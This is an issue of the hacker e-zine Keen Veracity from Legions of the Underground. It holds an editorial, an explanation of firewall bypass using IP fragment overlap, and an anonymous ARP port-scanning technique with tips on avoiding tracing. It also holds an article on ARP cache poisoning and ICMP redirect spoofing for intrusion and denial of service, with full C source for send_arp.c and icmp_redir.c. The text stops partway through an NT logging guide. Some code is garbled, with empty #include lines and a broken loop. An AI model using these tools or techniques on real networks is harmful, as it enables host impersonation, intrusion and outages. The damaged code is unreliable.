-------------------------------------------------------------------------------- _ _ _ _ _ | | / ) | | | | (_)_ | | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _ | |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | | | | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| | |_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ | (____/ -------------------------------------------------------------------------------- I S S U E (13) L e g i o n s o f t h e U n d e r g r o u n d -------------------------------------------------[www.legions.org]-------------- [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] W W W . L E G I O N S . O R G [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] [CONTENTS]------------------------------------------------------------[CONTENTS] [1]===========================[Editorial - Archimedes ] [2]==============[Best of KV Issue 3: Packet Fragmentation Attacks - Dr. Cohen ] [3]=============[Blind Scanning using ARP - Case/Phriction ] [4]=[Best of KV Issue 7: Playing redir games with ARP and ICMP - yuri volobuev ] [5]===========[Best of KV Issue 10: NT Logging - NtWak0 - ] [6]==[Blackboard 5 Password Enumeration - Case/Phriction - ] [7]====================[ The InfoSec Art of war - VulnDev - ] [8]=============================[Connect back shell in R - ] [9]=======================[Insight into: Non-repressive Governments - The Barn] [10]=========================[Snorting Cisco - Digital Ebola ] [11]====================[Artificial Infosex - Datacide ] [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] W W W . L E G I O N S . O R G [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] -------------------------------------------------------------------------------- [Editorial]================================[Archimedes ] -------------------------------------------------------------------------------- I'm sat here on a Sunday morning, about 12 months after KV13 was meant to be released with only a few things weighing on my mind (as far as KV readers are concerned). Please bear in mind that these are only my musings, not always in a coherent order. Firstly: Oh god my head hurts Secondly: Oh god my head hurts. Thirdly: Caffeine -- some time later -- Well it has been a VERY long time since the last KV release. What, in my opinion, has changed? (Other than the editor). Not much. This is what concerns me. There no longer seems to be such an enthusiasm into exploit development and research from the general community. Sadly by now most of us know where our "battle lines" are drawn. Those who don't are going to need to make their minds up soon I fear. It really isn't that long ago that the security "industry" became a major revenue earner. What really does concern me is that there are people out there who are more concerned about who is going to give them the most money for an exploit rather than the side-effects of putting it into the "public" domain. I have spoken to people, mostly the "next generation", who are VERY talented and DO have the enthusiasm. However they have debts and see a solution to these debts as being to sell their goods to "Security" companies. We know that Microsoft has had "issues" with anti-competitiveness. We know that Symantec now moderates the bugtraq list. We can assume that full-disclosure may not be for much longer. We should ALL BE AWARE that soon, un-licensed InfoSec research may be outlawed. Is it safe that there are companies receiving information and exploits from all over the globe, has anyone looked at monopolies within InfoSec? Imagine a company, Private Exploit Notification & Information Service They purchase exploits from the "underground". Now, with a bit of background knowledge we know that is a major player in exploit research and development. A lot of which can be linked to government funding. Does PEN&IS have any "hackers" which it is sending cash to through Western Union? Is it paying the government of a country it shouldn't be? If PEN&IS was being funded by a would that be illegal? How do we, as researchers know who we are giving our research to? Are we providing weapons of war? When will the move towards "Netcentric" warfare mean that exploits, such as holes in BGP, can be life threatening? We already win wars by hitting critical infrastructure with HE, that is tactics 101 (read VulnDev's publication below). When will governments be hitting it with -1day's? Would this explain the motions within the EU to ban exploit research and even including sections that would make partaking in such style discussions potentially illegal? Let's hope not. I truly hope that if your eyes are not open, they will be soon. Hence, it is my honour bound duty to present to you, Keen Veracity 13 (albeit a partially retro version). (Feel free to applaud, mock, heckle etc.). my great thanks to those people who gave input (constructive and otherwise) on this issue. yours, Archimedes July 25th 2004 -------------------------------------------------------------------------------- [Packet Fragmentation Attacks]=======================================[Dr. Cohen] -------------------------------------------------------------------------------- /* From Keen Veracity #3 */ ADVISORY: TCP packet fragment attacks against firewalls and filters System: TCP/IP networks Introduction to Packet Fragmentation Packet fragmentation is the part of the Internet Protocol (IP) suite of networking protocols that assures that IP datagrams can flow through any other sort of network. (For details, see Internet Request For Comments 791 (rfc791) and are available and searchable in electronic form from Info-Sec heaven on the World-Wide-Web at http://all.net, through gopher service at all.net, or by ftp service from rs.internic.net.) Fragmentation works by allowing datagrams created as a single packet to be split into many smaller packets for transmission and reassembled at the receiving host. Packet fragmentation is necessary because underlying the IP protocol, other physical and or logical protocols are used to transport packets through networks. A good example of this phenomena is on the difference between Ethernet packets (which are limited to 1024 bytes), ATM packets (which are limited to 56 bytes), and IP packets which have variable sizes up to about 1/2 million bytes in length. The only exception to this rule is in the case of an internet datagram marked don't fragment . Any internet datagram marked in this way is supposed to not be fragmented under any circumstances. If internet datagrams marked don't fragment cannot be delivered to their destination without being fragmented, they are supposed to be discarded instead. Of course, this rule doesn't have to be obeyed by the IP software actually processing packets, but it is supposed to be. How Packet Reassembly Attacks Work The packet fragmentation mechanism leads to attacks that bypass many current Internet firewalls, but the reason these attacks work is not because of the way fragmentation is done, but rather because of the way datagrams are reassembled. Datagrams are supposed to be fragmented into packets that leave the header portion of the packet intact except for the modification of the fragmented packet bit and the filling in of an offset field in the IP header that indicates at which byte in the whole datagram the current packet is supposed to start. In reassembly, the IP reassembler creates a temporary packet with the fragmented part of the datagram in place and adds incoming fragments by placing their data fields at the specified offsets within the datagram being reassembled. Once the whole datagram is reassembled, it is processed as if it came in as a single packet. According to the IP specification, fragmented packets are to be reassembled at the receiving host. This presumably means that they are not supposed to be reassembled at intermediate sites such as firewalls or routers. This decision was made presumably to prevent repeated reassembly and refragmentation in intermediate networks. When routers and firewalls followed the rules, they found a peculiar problem. The way firewalls and routers block specific services (such as telnet ) while allowing other services (such as the world wide web http service) is by looking into the IP packet to determine which Transfer Control Protocol (TCP) port is being used. If the port corresponds to 80, the datagram is destined for http service, while port 23 is used for telnet . In normal datagrams, this works fine. But suppose we didn't follow the rules for fragmentation and created improper fragmented packets? Here's what one attacker did: * Create an initial packet which claims to be the first fragment of a multi-packet datagram. Specify TCP port 80 in the TCP header so it looks like a datagram going to http service, which is allowed to pass the firewall. * The firewall passes the packet to the host under attack and passes subsequent packet fragments in order to allow the destination host to reassemble the packet. * One of the subsequent packets has an offset of 0 which causes the reassembler to overwrite the initial part of the IP packet. This is the part of the IP packet that specifies the TCP port. The attacker overwrites the IP port number which was originally 80 with a new port number such as 23, and is now granted telnet access to the host under attack despite the firewall that is supposed to block the service. -------------------------------------------------------------------------------- [Blind Scanning using ARP]===========================[Case ] -------------------------------------------------------------------------------- With people becoming more and more aware of security threats everyday, new measures need to be constantly taken to bypass these security measures. I am not writting this paper as a black hat or white hat but as someone who chooses to freely disseminate information to the public whether it be of the benign or malignant nature is of no consequence. ##### Normal Scanning techniques ##### Port scanning has gradually progressed along the years starting out from as simple as telneting to individual ports to program or scripts that make connect calls and advancing to custom crafted packets to use adherent weaknesses in protocols to glean information about hosts. NMAP being the most popular and efficient tool takes advantage of scanning techniques such as SYN, SYN/ACK, FIN, RST, NULL and so called XMAS scans. These scans have gained great popularity and are used frequently in probably most all port scans today. The new technique of scanning I will show you soon in blind port scanning including IPID scanning which is a feature in NMAP and a new technique I recently discovered BARP or Broadcast ARP scanning like a BURP you can't see it but sometimes you can feel the effects. Using normal TCP flag probing one can use a technique affectionately termed decoy by NMAP. This technique is performed by sending packets with fake Source host addresses along with your own packets to mask were the aparent scan is coming from. Though this technique can work quite well the scan can still usually be traced back to one of two or three computers unless you used 100 decoys in which case the time it took to perform the scan would slow down significantly. BARP Scanning uses the TCP FIN or TCP NULL or TCP XMAS scanning techniques along with perhaps a TCP ACK scan to see if ports are filtered. The reason we use FIN, NULL and XMAS is that when a port is probed with one of these types of packets they port in question should return a RST if the port is closed or nothing if it is open, the host should, mind you, act this way and we will assume it does for this paper as we describe BARP scanning later. ##### Blind Port Scanning techniques ##### Blind port scanning techniques are based of the premise that you do not actually have to send a packet from your host to the target host and have it return the packet to your host. Instead in some way you manipulate a packet to exploit features in protocols. In this paper I will cover IPID scanning and finally BARP scanning. ##### IPID Scanning ##### IPID scanning or idle host scanning is a blind port scanning technique taking advantage of a predictably incremented IP ID value in a packet. To do this, a person finds an idle host, host idle and forges packets from host idle to target host. Now if we perform a SYN scan on target host and the port is closed it will send a RST packet back to host idle which will drop it and end of story but if the port is open a subsequent SYN/ACK will be sent to host idle and host idle will reply to target host with a RST to end the communication involuntarilly incrementing its IP ID values. So after each forged packet we send from host idle to target host we probe host idle's IP ID number to see if it has incremented. Check out NMAP and papers written by Fyodor for more information on this subject. http://www.insecure.org/nmap ##### BARP Scanning ##### BARP scanning is based of the concept that when a packet is sent from host A to nonexistent host B, host B - 1 hop will send an arp broadcast in an effort to locate the location of host B. Voila commence BARP scans. So we should now understand the basic concept and be able to exploit this feature to perform blind port scans or ping scans. First we find a host on our subnet that does not exist, host none. Now we forge a FIN packet from host none, to our target host. And we wait and listen for arp broadcasts. Now if we receive a broadcast looking for the hardware address of host none we know that the taget host must have sent a packet back. Since FIN packets only return RSTs when the ports are closed we have found a closed port. Now if on the next packet sent no arp broadcast is snooped we know that the port is most likely open. The magic of great blind scans begin. The problem is the scan can be narrowed down to your subnet, the benefit is that is can be one of 253 computers. Now you can perform anonymous port scans on any host! The hardware address in the ethernet header of the packet before it hits the first router might be your only concern if it is logged, so don't bequeth the task of taking out .govs and .microsoft.coms grasshoper until understood you have this fact and care you have taken of it. I'm a chunky monkey from funkytown... code at: http://www.legions.org/~phric/arpscan.c Questions comments email phric@legions.org. -------------------------------------------------------------------------------- [Playing redir games with ARP and ICMP]==========================[yuri volobuev] -------------------------------------------------------------------------------- /* From Keen Veracity #7 */ [ -Intro- ] There're bugs and there're features. All too often the distinction between the two is in the eye of the beholder. I'd like to show how two legitimate protocols, ARP and ICMP, while properly implemented, can be used to achieve something which is, well, not desirable. While passive attacks (sniffing) that take advantage of the root access to LAN are extremely popular and every half-way decent root kit has some kind of a net sniffer, active attacks are not nearly as widespread. Yet, active participation in the life of your LAN may bring lots of fun and joy. You knew that already, it's just that technical details had been somewhat obscure. So, let there be more light. Possibilities outlined here include spoofing and DoS. While other means of spoofing, such as IP blind spoofing, are more general and powerful, in terms of who can use them, they require quite a lot of (guess)work and may be hard to implement. ARP spoofing, on contrary, is very easy and robust. While ARP spoofing is only possible on a local network, it may be a serious concern as a way to extend an already existing security breach. If somebody can break into one machine on a subnet, ARP spoofing can be used to compromise the rest of it. [ -Background on ARP- ] [well, originally i wrote few paragraphs outlining arp, but then i figured that if you didn't know how it works already, you'll need to learn it from a better source. I recommend "TCP/IP Illustrated" by W.Richard Stevens.] [ -What can be done- ] Let's consider a hypothetical network IP 10.0.0.1 10.0.0.2 10.0.0.3 10.0.0.4 hostname cat rat dog bat hw addr AA:AA BB:BB CC:CC DD:DD (for short) all connected by Ethernet in some simple way (i.e. no switches, no smart hubs). You're on cat, you have root and desire to break into dog. You know that dog trusts rat, so if you can successfully spoof rat, something can be gained. First thing that comes to mind (I think everybody was thinking about this at some point) is "why don't I set my IP to the IP of that other machine and..." That won't work, at least it won't work reliably. If you tell Ethernet driver on cat that it's IP is 10.0.0.2, it'll start answering ARP requests to that IP. But so will rat. It's a pure race condition, and there's no winner. However, you can easily be the loser, because this particular situation happens quite often when some box is misconfigured to use somebody's else's IP, so many implmentations immedeately notice that and loudly complain. Many network traffic analyzers flag that, too. Seeing a syslog message saying something nasty (mentioning cat's Ethernet address) on the LAN admin's console is not quite what you want. And what you want you won't necessarily get, that is getting anything remotely close to a working connection. This of course can be helped. The attached program, send_arp.c, can be a useful tool. Just as its name says, it sends an ARP packet [ARP reply, to be exact: since the protocol is stateless, reply will be happily accepted even if no one ever asked for it. Request would do just as well, though, because of the ARP caching logic] to the net, and you can make this packet to be what you want. What you want is an ability to specify source and target IP and hardware addresses. First, you don't want your Ethernet driver to talk too much, and it's easy to accomplish with ifconfig -arp. Of course, it'll need ARP info anyway, so you'll have to feed it to the kernel manually with arp(8). The critical part is convincing your neighbours. In the case being described here, you want dog to believe that rat's hardware address is that of cat (AA:AA), so you send ARP reply with source IP 10.0.0.2, source hw address AA:AA, target IP address 10.0.0.3 and target hardware address CC:CC. Now, for all dog knows, rat is at AA:AA. Cache entry would expire, of course, so it needs to be updated (request needs to be resent). How often depends on the particular system, but every 40 sec or so should be sufficient for most cases. Send it more often if you want, it won't hurt. A complication here could come from an ARP caching implementation feature. Some systems (e.g. Linux) would try to update their cache entries by sending a unicast ARP request to the cached address (like your wife calling you just to make sure you're there). Such a request can screw things up, because it could change victim's ARP entry that we just faked, so it must be prevented. This can be accomplished by feeding the "wife" system with replies so that it never has to ask for it. Prevention is the best cure, as always. This time, a real packet from dog to rat should be sent, it's just that cat will be sending it, not dog, but for rat there's no way to tell. Again, doing it about every 40 sec is usually OK. So the procedure is simple. Bring up an alias interface, e.g. eth0:1 (or use your current one, whatever), with rat's IP and ARP on -- you need to set up some cache entries first, and it won't work on non-arp interface. Set up a host route entry for dog through the right interface. Set up a cache entry for dog, turn off arp, and it's all set. Now, inject the venom with send_arp (hitting both dog and rat) and for all dog knows, you're on rat. Just remember to keep sending those ARP packets to dog and rat. This attack only works on the local network, of course (in general, it can reach as far as ARP packets can get, usually not too far because ARP packets are almost never routed). But an interesting extension here is taking this outside by replacing dog's hardware address in the above plan with the router's. If it works (I'm not sure it always will, router's ARP implementation may be tougher to fool, and since I don't want to try it on real routers, I don't know, but there's no simple reason why not) you can easily impersonate any machine on the local network to the rest of the world. So the target machine could really be anywhere, but the machine you're impersonating must be on the same LAN. [ -What else can be done- ] Aside from spoofing, there's range of other things you can do with ARP. The sky is really the limit here. DoS is the most obvious application. Feeding victim wrong hardware address is a powerful way to make it mute. You can prevent it from talking to any particular machine (and ARP cache size usually allows for the whole network to fit in, so effectively you can stop it from talking to everybody for some time). Obvious target would be the router. Cache poisoning again should be two-way: both the victim system and the system you don't want victim to talk to should be fed. The simplest case would be feeding a non-existant address. It's not the most efficient, though, as the system will quickly realize that it's talking to nobody and send out an ARP request. Of course, your next drop of poison will nullify this, but you have to do it quite often. A more efficient approach here is feeding the victim with the hardware address of the wrong machine, which itself is alive and well. Again, it depends on a particular situation, but very often what happens is that victim keeps sending out packets of various types that arrive to the wrong destination, and destination system will promptly send ICMP Xxx Unreachable messages back, thus emulating a connection in some perverted way. This pseudo-conection can easily postpone cache expiry. On Linux, for example, pseudo-connection raises cache expiry from usual 1 min to about 10 min. By that time, most or all TCP connections are screw up. Could be quite annoying. This way, one ARP packet can screw someone. An interesting twist here is so-called "gratuitous ARP". It's when the source and target IPs in the ARP request are the same, and it usually appears in a form of an Ethernet broadcast. Some implementations recognize it as a special case, that of a system sending out updated information about itself to everybody, and cache that request. This way one packet could screw up the entire network. It must be admitted, though, that gratuitous ARP is not really defined as a part of ARP, so it's up to vendor to (not) implement it, and it's becoming increasingly less popular. ARP is a serious tool for professional practical jokes, too. Just imagine somebody setting up a relay, or tunnel, in a form of own machine that convinced two neighbours to send their packets intended for each other to relay's Ethernet. If relay just forwards packets to their real destinations, no one would even notice. However, some simple data stream modifications could have quite a spectacular effect on one's mental health. A simple, CPU-inexpensive "filter" could be swapping random two bytes at irregular long intervals. If it hits the data portion, most of the checksums won't change, i.e. data stream would seem to be intact, yet strange and unexplicable things _will_ happen for no apparent reason. [ -ICMP redirects- ] An effect somewhat similar to ARP cache poisoning can be achieved in a different way, again using a legitimate protocol feature, ICMP route redirects. Such a redirect is normally sent by the default router to the system to indicate that there's a shorter route to some particular destination. Originally, both network and host route redirects were proposed, but later net redirects were deprecated and now are usually treated as host redirects. Properly constructed ICMP packet that passes all sanity checks (it must come from the default router for the destination it's redirecting, new router should be on a directly connected network, etc.) it causes a host-route entry be added to the system routing table. The concept is just as secure as ICMP itself, i.e. (security)NULL. Spoofing routers IP address is simple, and attached icmp_redir.c does just that. Host Requirements RFC states that system MUST follow ICMP redirects unless it's a router. And indeed all the systems I've tried happily accept it (except vanilla Linux 2.0.30, where it's broken, it works in 2.0.29 and 2.0.31pre9, according to Alan Cox). ICMP redirects present a rather potent DoS. Unlike ARP cache entries, those host routes won't expire with time. And of course no access to local network is required, attack can be launched from anywhere. So if the target system does accept ICMP redirects (and packets can actually reach it) that system can be stopped from talking to any particular address on the net (well, not all, but those that aren't on the same subnet with the target). Nameservers would be an obvious target. [ -What can be done about it- ] ARP is low level protocol and as such is usually hidden from normal people. LAN admins may be concerned with it at times, but if all goes well no one pays attention. One can always inspect contents of ARP cache using arp(8), especially if there's some misterious network problem, but again it's not the first thing that comes to mind. Even W95 has arp command, and remembering about it may be helpful in certain situations. However, if you're the target of the attack originating from another network via gateway arp spoofing, there's no way to tell. Similarly, host routing table could be examined to spot ICMP-generated entries (in most versions of route(1) they are marked with D letter in flags field). Just be aware. The above ARP attack scheme work perfectly for plain old 10Base2 Ethernet. However, if machines are interconnected in some more advanced way, particularly using some smart hubs or switches, attack can be more visible or even impossible (same goes for passive attacks). So there's yet another reason to invest in a good piece of network equipment. A good deal of peace of mind may just come with it. In general, however, I personally find it rather sad that things like ICMP redirects were made a default. First, it's often not necessary because many networks have very simple structure and there's never a need for anything in addition to usual routing table. Second, on more sophisticated networks routing table can be just as well set manually, it's not really such a dynamic thing, so why do it via ICMP? And finally, it's dangerous, so I would like to disable it on my systems, even though it'll make them less compliant with RFC1122. Alas, it may not be easy. On Linux or any other OS with sources available, I can at least hack the kernel and #define it out. On Irix 6.2 and possibly other versions one can set icmp_dropredirects=1 with systune (I'm genuinely surprised to see it there, I really am). Other OSes can be configurable, too, I have no information. With ARP, we basically face a situation when the problem of name resolution is solved dynamically without a centralized server. It doesn't have to be this way. When one wants to map hostname to an IP, nameserver is queried or /etc/hosts is consulted, i.e. there's some static mapping established. I don't see why a similar thing can't be done with ARP. Ethernet hardware addresses don't change too often, and when they do change, it won't kill net admin to change the corresponding map. Ethernet can be forced in no-arp mode, you just need to make sure your ARP cache has all the entries made as permanent. As a bonus, this will reduce network traffic somewhat. Standard procedures can be used to distribute ARP map, e.g. rdist, rsync (I would say NIS, but if you use NIS, ARP is probably not your top security concern anyway). Old tradition of /etc/ethers can be brought back to life. But getting a kick-ass Ethernet switch still looks better to me (paying for it does not, though). And old wisdom still shine bright though time: don't use hostname-only based auth. Those who do shall have no mercy from net gods. cheers, yuri P.S. On Firewalls I anticipate that many of you, having read the section about ICMP, are already flexing the fingers preparing to write a follow-up explaining that all those ICMP packets can be filtered out on the firewall, thus it's not a problem. Please don't. I'm well aware of the concept. An if you feel you absolutely have to, don't cc the list needlessly. I have to note that many people use "i have firewall, and I like it, therefore everyone else should get one or get lost" logic to argue that certain security problems are less serious because they can be effectively eliminated by putting a firewall between the protected network and Internet. While I fully agree that having firewall is very good for security, I want to note that it's not always possible or effective. Imagine an environment where all machines are directly connected to Internet, you have to share subnet with people you don't know who have vanilla SGI boxes screaming "hack me pleeeease, my vendor did such a great job of making it eeeeeeasy" all over the place (and sure, these people know Unix, they've seen it in Jurassic Park... and that would be about it), and the router to your subnet is controlled by a separate organization. Welcome to a standard academic environment, where people don't use firewalls. In fact, in some of those environments one would be useful to protect the outside world from the people on the inside. Still, people work there, and use computers, too. And that's where per-host security solutions are necessary, it's a jungle where every host is for itself. So please, next time you think "firewall", remember, it's not for everyone. CUT HERE /* send_arp.c This program sends out one ARP packet with source/target IP and Ethernet hardware addresses suuplied by the user. It compiles and works on Linux and will probably work on any Unix that has SOCK_PACKET. The idea behind this program is a proof of a concept, nothing more. It comes as is, no warranty. However, you're allowed to use it under one condition: you must use your brain simultaneously. If this condition is not met, you shall forget about this program and go RTFM immediately. yuri volobuev'97 volobuev@t1.chem.umn.edu */ #include #include #include #include #include #include #include #include #include #include #define ETH_HW_ADDR_LEN 6 #define IP_ADDR_LEN 4 #define ARP_FRAME_TYPE 0x0806 #define ETHER_HW_TYPE 1 #define IP_PROTO_TYPE 0x0800 #define OP_ARP_REQUEST 2 #define DEFAULT_DEVICE "eth0" char usage[]={"send_arp: sends out custom ARP packet. yuri volobuev'97\n\ \tusage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr\n\n"}; struct arp_packet { u_char targ_hw_addr[ETH_HW_ADDR_LEN]; u_char src_hw_addr[ETH_HW_ADDR_LEN]; u_short frame_type; u_short hw_type; u_short prot_type; u_char hw_addr_size; u_char prot_addr_size; u_short op; u_char sndr_hw_addr[ETH_HW_ADDR_LEN]; u_char sndr_ip_addr[IP_ADDR_LEN]; u_char rcpt_hw_addr[ETH_HW_ADDR_LEN]; u_char rcpt_ip_addr[IP_ADDR_LEN]; u_char padding[18]; }; void die(char *); void get_ip_addr(struct in_addr*,char*); void get_hw_addr(char*,char*); int main(int argc,char** argv){ struct in_addr src_in_addr,targ_in_addr; struct arp_packet pkt; struct sockaddr sa; int sock; if(argc != 5)die(usage); sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP)); if(sock<0){ perror("socket"); exit(1); } pkt.frame_type = htons(ARP_FRAME_TYPE); pkt.hw_type = htons(ETHER_HW_TYPE); pkt.prot_type = htons(IP_PROTO_TYPE); pkt.hw_addr_size = ETH_HW_ADDR_LEN; pkt.prot_addr_size = IP_ADDR_LEN; pkt.op=htons(OP_ARP_REQUEST); get_hw_addr(pkt.targ_hw_addr,argv[4]); get_hw_addr(pkt.rcpt_hw_addr,argv[4]); get_hw_addr(pkt.src_hw_addr,argv[2]); get_hw_addr(pkt.sndr_hw_addr,argv[2]); get_ip_addr(&src_in_addr,argv[1]); get_ip_addr(&targ_in_addr,argv[3]); memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN); memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN); bzero(pkt.padding,18); strcpy(sa.sa_data,DEFAULT_DEVICE); if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){ perror("sendto"); exit(1); } exit(0); } void die(char* str){ fprintf(stderr,"%s\n",str); exit(1); } void get_ip_addr(struct in_addr* in_addr,char* str){ struct hostent *hostp; in_addr->s_addr=inet_addr(str); if(in_addr->s_addr == -1){ if( (hostp = gethostbyname(str))) bcopy(hostp->h_addr,in_addr,hostp->h_length); else { fprintf(stderr,"send_arp: unknown host %s\n",str); exit(1); } } } void get_hw_addr(char* buf,char* str){ int i; char c,val; for(i=0;i= 'a' && c <= 'f') val = c-'a'+10; else die("Invalid hardware address"); *buf = val << 4; if( !(c = tolower(*str++))) die("Invalid hardware address"); if(isdigit(c)) val = c-'0'; else if(c >= 'a' && c <= 'f') val = c-'a'+10; else die("Invalid hardware address"); *buf++ |= val; if(*str == ':')str++; } } CUT HERE /* icmp_redir.c This program sends out an ICMP host redirect packet with gateway IP supplied by user. It was written and tested under Linux 2.0.30 and could be rather easily modified to work on most Unices. The idea behind this program is a proof of a concept, nothing more. It comes as is, no warranty. However, you're allowed to use it under one condition: you must use your brain simultaneously. If this condition is not met, you shall forget about this program and go RTFM immediately. yuri volobuev'97 volobuev@t1.chem.umn.edu */ #include #include #include #include #include #include #include #include #include #include #include #include #define IPVERSION 4 struct raw_pkt { struct iphdr ip; /* This is Linux-style iphdr. Use BSD-style struct ip if you want */ struct icmphdr icmp; struct iphdr encl_iphdr; char encl_ip_data[8]; }; struct raw_pkt* pkt; void die(char *); unsigned long int get_ip_addr(char*); unsigned short checksum(unsigned short*,char); int main(int argc,char** argv){ struct sockaddr_in sa; int sock,packet_len; char usage[]={"icmp_redir: send out custom ICMP host redirect packet. \ yuri volobuev'97\n\ usage: icmp_redir gw_host targ_host dst_host dummy_host\n"}; char on = 1; if(argc != 5)die(usage); if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){ perror("socket"); exit(1); } sa.sin_addr.s_addr = get_ip_addr(argv[2]); sa.sin_family = AF_INET; packet_len = sizeof(struct raw_pkt); pkt = calloc((size_t)1,(size_t)packet_len); pkt->ip.version = IPVERSION; pkt->ip.ihl = sizeof(struct iphdr) >> 2; pkt->ip.tos = 0; pkt->ip.tot_len = htons(packet_len); pkt->ip.id = htons(getpid() & 0xFFFF); pkt->ip.frag_off = 0; pkt->ip.ttl = 0x40; pkt->ip.protocol = IPPROTO_ICMP; pkt->ip.check = 0; pkt->ip.saddr = get_ip_addr(argv[1]); pkt->ip.daddr = sa.sin_addr.s_addr; pkt->ip.check = checksum((unsigned short*)pkt,sizeof(struct iphdr)); pkt->icmp.type = ICMP_REDIRECT; pkt->icmp.code = ICMP_REDIR_HOST; pkt->icmp.checksum = 0; pkt->icmp.un.gateway = get_ip_addr(argv[4]); memcpy(&(pkt->encl_iphdr),pkt,sizeof(struct iphdr)); pkt->encl_iphdr.protocol = IPPROTO_IP; pkt->encl_iphdr.saddr = get_ip_addr(argv[2]); pkt->encl_iphdr.daddr = get_ip_addr(argv[3]); pkt->encl_iphdr.check = 0; pkt->encl_iphdr.check = checksum((unsigned short*)&(pkt->encl_iphdr), sizeof(struct iphdr)); pkt->icmp.checksum = checksum((unsigned short*)&(pkt->icmp), sizeof(struct raw_pkt)-sizeof(struct iphdr)); if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt: IP_HDRINCL"); exit(1); } if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa)) < 0){ perror("sendto"); exit(1); } exit(0); } void die(char* str){ fprintf(stderr,"%s\n",str); exit(1); } unsigned long int get_ip_addr(char* str){ struct hostent *hostp; unsigned long int addr; if( (addr = inet_addr(str)) == -1){ if( (hostp = gethostbyname(str))) return *(unsigned long int*)(hostp->h_addr); else { fprintf(stderr,"unknown host %s\n",str); exit(1); } } return addr; } unsigned short checksum(unsigned short* addr,char len){ register long sum = 0; while(len > 1){ sum += *addr++; len -= 2; } if(len > 0) sum += *addr; while (sum>>16) sum = (sum & 0xffff) + (sum >> 16); return ~sum; } -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [NT Logging]======================================[NtWak0 ] -------------------------------------------------------------------------------- /* From Keen Veracity #10 */ +-----------------------------------------------------------------------------+ |Author : NtWaK0 | |Crew : Legions Of the Underound | |Subject: NT LOGGING | |Date: Sep-3-2000 | +-----------------------------------------------------------------------------+ INTRODUCTION ============ Many peoples asked me about NT and where are THESE logs,so here we go something I can think of about NT monitoring that will help NT admins and others peoples too :) First Let US Start With a Breif Description Of NT Logs. NT LOGS DESCRIPTION =================== Thier is no magic in NT logs like the UNIX logging.To manager you NT logs you have to use "Event Viewer". What is "Event Viewer", WELL IF YOU CLICK THE HELP IN NT VIEWER you will get a nice description.: Event Viewer is the tool you can use to monitor events in your system. You can use Event Viewer to view and manage System, Security, and Application event logs. You can also archive event logs. The event-logging service starts automatically when you run Windows NT. You can stop event logging with the Services tool in Control Panel. Let me comment on this last phrase from MS HELP "You can stop event logging with the Services tool in Control Panel" WELL IT IS NOT TRUE, YOU CANNOT STOP EVENT VIEWER WHILE YOU ARE RUNNING NT. WHAT YOU CAN DO IS DISABLE IT THAT MEAN NEXT TIME YOU REBOOT THE EVENT VIEWER SERVICE WILL BE STOPED. So to resume you cannot STOP EVENTLOG from the GUI you can only disabled it and from the command line you will get this : ----------------------------------------------[NET STOP EVENTLOG DUMP]------ C:\>net stop EVENTLOG The requested pause or stop is not valid for this service. More help is available by typing NET HELPMSG 2191. C:\>NET HELPMSG 2191 The requested pause or stop is not valid for this service. EXPLANATION This command is invalid for this service, or the service cannot accept the command right now. ACTION If the service normally accepts this command, try typing it again later. ---------------------------------------------------------------------------- LOGS TYPE ========= The three types of NT event logs are: System log ---------- Tracks miscellaneous system events, e.g. tracks events during system startup and hardware and controller failures. Application log --------------- Tracks application related events, e.g.applications generate informational such as failing to load a DLL will appear in the this log. Security log ------------ Tracks events such as logon, logoff, changes to access rights, and system startup and shutdown. By default like i said you will see later in this paper that the security log is turned off by default. LOGS LOCATION AND ENABLING ========================== The location of NT logs is : %SYSTEMROOT%\system32\config\SysEvent.Evt %SYSTEMROOT%\system32\config\SecEvent.Evt %SYSTEMROOT%\system32\config\AppEvent.Evt By default NT DOES not log all the event.You have to enable auditing, to do so follow these steps : 1- From the Start Menu, choose Program and then Administrative Tools (Common). From the Administrative Tools submenu, choose User Manager, which displays the User Manager window. 2- From User Manager Menu Click POLICIES then Click Audit, the Audit policy windows appeare 3- Select the Radio Box "Audit These Events" 4- Select what you want and Click OK and Close User Manager :) NOTE: If you decide to Audit all event you better HAVE SOME KICK ASS MACHINE cause this is going to suck a lot of resources Auditing of Privileges ====================== Certain privileges in the system are not audited by default even when auditing on privilege use is turned on. This is done to control the growth of audit logs. The privileges are: 1- Bypass traverse checking *** To Rveryone *** Is granted to everyone so is meaningless from auditing perspective 2- Debug programs *** To Administrators *** Not used in a working system and can be removed from administrators group 3- Create a token object *** To NO One *** Should not be granted to anyone 4- Replace process level token *** To NO One *** Should not be granted to anyone 5- Generate Security Audits *** To NO One *** Should not be granted to anyone 6- Backup files and directories *** To Administrators Backup Operators. *** Used during normal system operations 7- Restore files and directories *** To Administrators Backup Operators. *** Used during normal system operations To enable auditing of these privileges, add the following key Hive: HKEY_LOCAL_MACHINE\SYSTEM Key: System\CurrentControlSet\Control\Lsa Name: FullPrivilegeAuditing Type: REG_BINARY Value: 1 Or Create a text file call it audit.reg and cut and past the lines below -----------------------------------------------------------[SNIP HERE]------ REGEDIT4 ADD A BLANK LINE HERE [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] "FullPrivilegeAuditing"=hex:01 ADD A BLANK LINE HERE 